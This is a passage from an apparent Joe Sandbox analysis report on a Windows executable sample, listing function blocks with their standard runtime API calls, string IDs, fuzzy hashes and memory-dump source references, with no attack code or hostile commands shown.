                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3140674995-0
                                                                                                                                                                                                                          • Opcode ID: 98f61b962b635611d8ce928467ecb0ca7bec666144f18dc59094fce9aef6e69c
                                                                                                                                                                                                                          • Instruction ID: 69bc7951f61f4597eaf2bf0efa6022b59c2b589a23f32fae2f11077ed4a22e4d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98f61b962b635611d8ce928467ecb0ca7bec666144f18dc59094fce9aef6e69c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D31FA76709E8286EB709F70E8443A9B3B4FB85744F84503ADA8D47B99DF78D548C720
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1239891234-0
                                                                                                                                                                                                                          • Opcode ID: d1c0753b45e426435a8a4ce7cdf9e8e24984b0068f93f26bb6ef6e37265ddb95
                                                                                                                                                                                                                          • Instruction ID: 9a708144194a0d8a3eff3c6d2fa971c72e7acd26a16faaa8eaea9a74f149dba1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1c0753b45e426435a8a4ce7cdf9e8e24984b0068f93f26bb6ef6e37265ddb95
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64314C32718F8286EB609B35E9443AEB3B4FB89754F901135EA9D43B58DF38C145CB10
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2227656907-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
• Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF79CD64CFE,?,?,?,00007FF79CD649F0,?,?,?,00007FF79CD63175), ref: 00007FF79CD64AD1
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF79CD64CFE,?,?,?,00007FF79CD649F0,?,?,?,00007FF79CD63175), ref: 00007FF79CD64ADF
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF79CD64CFE,?,?,?,00007FF79CD649F0,?,?,?,00007FF79CD63175), ref: 00007FF79CD64B09
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF79CD64CFE,?,?,?,00007FF79CD649F0,?,?,?,00007FF79CD63175), ref: 00007FF79CD64B77
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF79CD64CFE,?,?,?,00007FF79CD649F0,?,?,?,00007FF79CD63175), ref: 00007FF79CD64B83
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                          • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                          • Opcode ID: 98d9174312598c4a04092f17d89ad65b0ae9d13167452c4ab0cd5aff0e5c734b
                                                                                                                                                                                                                          • Instruction ID: f5479ab72ec8d0ff7efc1d44eae811fc32fae7e88bf518cab9dcdca10d7b7856
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98d9174312598c4a04092f17d89ad65b0ae9d13167452c4ab0cd5aff0e5c734b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02316E21B1AE4391EF31EB36E600675B2A4BF48BA4F896535ED1D47794EE3CE445C320
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                                                                          • Opcode ID: b88695dae9efd57bf988d7feafabc4692ebde99282553b2e04a6e7434c849825
                                                                                                                                                                                                                          • Instruction ID: 793dd06227bf86fea691de7b0644637dca9a2374aefa1d0c92276cf74cc53fd0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b88695dae9efd57bf988d7feafabc4692ebde99282553b2e04a6e7434c849825
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67213A20B0CE4781FE74BB356755179F272AF447A4F847635E92E06BC6DE3CA402C220
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                          • String ID: CONOUT$
                                                                                                                                                                                                                          • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                          • Opcode ID: f9eaa7f7d60b527212cfcf40deb3c737339707099e914ac58b9d60e49017044c
                                                                                                                                                                                                                          • Instruction ID: 909cb6762caeb634865193f8c206c04eca83906d50dd1e90c6dfce296481f64f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9eaa7f7d60b527212cfcf40deb3c737339707099e914ac58b9d60e49017044c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02119632718F4282EB60AB62F984325B2B4FB88BE4F805234E95E47794CF7CD544C750
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF79CD670DD,?,?,?,?,00007FF79CD671A0), ref: 00007FF79CD66D0B
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF79CD670DD,?,?,?,?,00007FF79CD671A0), ref: 00007FF79CD66D41
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF79CD670DD,?,?,?,?,00007FF79CD671A0), ref: 00007FF79CD66D6E
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF79CD670DD,?,?,?,?,00007FF79CD671A0), ref: 00007FF79CD66D7F
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF79CD670DD,?,?,?,?,00007FF79CD671A0), ref: 00007FF79CD66D90
                                                                                                                                                                                                                          • SetLastError.KERNEL32(?,?,?,00007FF79CD670DD,?,?,?,?,00007FF79CD671A0), ref: 00007FF79CD66DAB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                                                                          • Opcode ID: cef237a7154ba8bbe1c7310cb62ac7f2d9cb81adb37255596516d0a16f09c46e
                                                                                                                                                                                                                          • Instruction ID: 82d356c5b983fd0e0de3d2deab7843f19790844b2c3a29aff0a031cc2c9264fc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cef237a7154ba8bbe1c7310cb62ac7f2d9cb81adb37255596516d0a16f09c46e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9113B21B1CE4342FE74B731A766179F272AF457A0F846735E92E067D6DE3CA402C620
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                          • Opcode ID: ba4b32788355262f80aa9f09833ab5d54779705550cbd92be88f139d7f9e84ba
                                                                                                                                                                                                                          • Instruction ID: 1f9d5e787d7156a1a52f5db1cc07f5fe04291c7a0462251e454e2994207e1e55
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba4b32788355262f80aa9f09833ab5d54779705550cbd92be88f139d7f9e84ba
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25F03C65B09E0382EE24AB74E459379A330AF497A5F942635C56E462E4DF2CD085C720
                                                                                                                                                                                                                          APIs
Memory Dump Source
• Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
• Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _set_statfp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1156100317-0
                                                                                                                                                                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                          • Instruction ID: 1f940015cb9fd703c4d1a5a6da72bb9f2f20615c6826cb5c342a22e03c77e94f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF119D76F48E1301FF743138E641379B0706F99364EA52A30EA6E066D7DF2EE941C660
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF79CD64E5F,?,?,00000000,00007FF79CD650FA,?,?,?,?,?,00007FF79CD65086), ref: 00007FF79CD66DE3
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF79CD64E5F,?,?,00000000,00007FF79CD650FA,?,?,?,?,?,00007FF79CD65086), ref: 00007FF79CD66E02
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF79CD64E5F,?,?,00000000,00007FF79CD650FA,?,?,?,?,?,00007FF79CD65086), ref: 00007FF79CD66E2A
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF79CD64E5F,?,?,00000000,00007FF79CD650FA,?,?,?,?,?,00007FF79CD65086), ref: 00007FF79CD66E3B
                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF79CD64E5F,?,?,00000000,00007FF79CD650FA,?,?,?,?,?,00007FF79CD65086), ref: 00007FF79CD66E4C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                                                                          • Opcode ID: 363560c9d3aeb12ce5f8eaf5039eab8462c4c74fce632259e44cdf386c032e5d
                                                                                                                                                                                                                          • Instruction ID: b7ff6e0d3b2564fad5f8c37107d84fbd7349e9fed28ac574298000a85f875376
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 363560c9d3aeb12ce5f8eaf5039eab8462c4c74fce632259e44cdf386c032e5d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84112C21B08E4341FE78B735A762179F2726F447A0F84A335E92D467D6DE3CE402C620
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                                                                          • Opcode ID: aebdd9a1ae816db97670f7c5193398a28dd9f1208fdaed33f0aad7c8148d48c3
                                                                                                                                                                                                                          • Instruction ID: 3bbed3535049b22700203fc37b4c0dd459dbbd663938a40c8ab96de7ac4832d1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aebdd9a1ae816db97670f7c5193398a28dd9f1208fdaed33f0aad7c8148d48c3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8511F220B18E4741FE78B7356A621B9F671AF45768E997735E93E0A2C2DD3DB402C230
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                          • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                          • Opcode ID: 7aa7bbb7fbd313fa5e06adeda51d8af0c078cd230194add9ef97a0c38e9eeb32
                                                                                                                                                                                                                          • Instruction ID: 6e4d9b925fe6ca7f28550469fc6364713226cdb24449876d04e78ecd91997598
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7aa7bbb7fbd313fa5e06adeda51d8af0c078cd230194add9ef97a0c38e9eeb32
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C51AF32B09E478AEF24EF25D544679B3A1EF48B88F909135DA9A43788DF3DE845C710
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                          • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                          • Opcode ID: f567cd96861b94a6c07409aeef72aaba9e19c83fbb116bd89495255ff68ed431
                                                                                                                                                                                                                          • Instruction ID: 596ee8cabad3fcbd9530bc4c74f0a07b7bfb38393bdd8c1e266c95f0e3c01f2e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f567cd96861b94a6c07409aeef72aaba9e19c83fbb116bd89495255ff68ed431
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73616F32A08F8681DA70AB25E5403AAF7B0FB99794F445235EB9D03B95DF7CD194CB10
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                          • Opcode ID: 43d66cd96d854834a2285823ad289c98bbc344233fb91ec6caba7a539e432d97
                                                                                                                                                                                                                          • Instruction ID: 4dadf0922a18d6210f5c66f7e393d1c7db9fecf07ebd0718acf46e74c27fe423
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43d66cd96d854834a2285823ad289c98bbc344233fb91ec6caba7a539e432d97
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16516F32608F4386EF74EE219644269B7B0EB59B94FA4A136DA9C47785CF3CE461C720
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2718003287-0
                                                                                                                                                                                                                          • Opcode ID: 710a4465047731046d486a5f91accc2b75631e136eff9fc818dde3b1c157220a
                                                                                                                                                                                                                          • Instruction ID: cb1dbb177f1c4a05c60f9bad2453d7264f75d010fba3e8c4af73c98fd48e0836
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 710a4465047731046d486a5f91accc2b75631e136eff9fc818dde3b1c157220a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0ED10632B18E8299EB21DFB5D5402AC77B1FB54798B809235CE5D97BD9DE38E006C310
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF79CD6B91F,00000000), ref: 00007FF79CD6BA50
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF79CD6B91F,00000000), ref: 00007FF79CD6BADB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2046555415.00007FF79CD61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79CD60000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046518843.00007FF79CD60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046596627.00007FF79CD6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046626610.00007FF79CD79000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046747060.00007FF79CD7A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046877200.00007FF79CFAD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2046927340.00007FF79CFAF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff79cd60000_K6qneGSDSB.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 953036326-0
                                                                                                                                                                                                                          • Opcode ID: 059fa1959f06b925a0592a60213fc9ccff7ea213fafb1dec891a6f1ac717a15f
                                                                                                                                                                                                                          • Instruction ID: db9d57434f2cac24c8f67c0ad4be036711dd242b519785387b5f6465bd46a797
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 059fa1959f06b925a0592a60213fc9ccff7ea213fafb1dec891a6f1ac717a15f
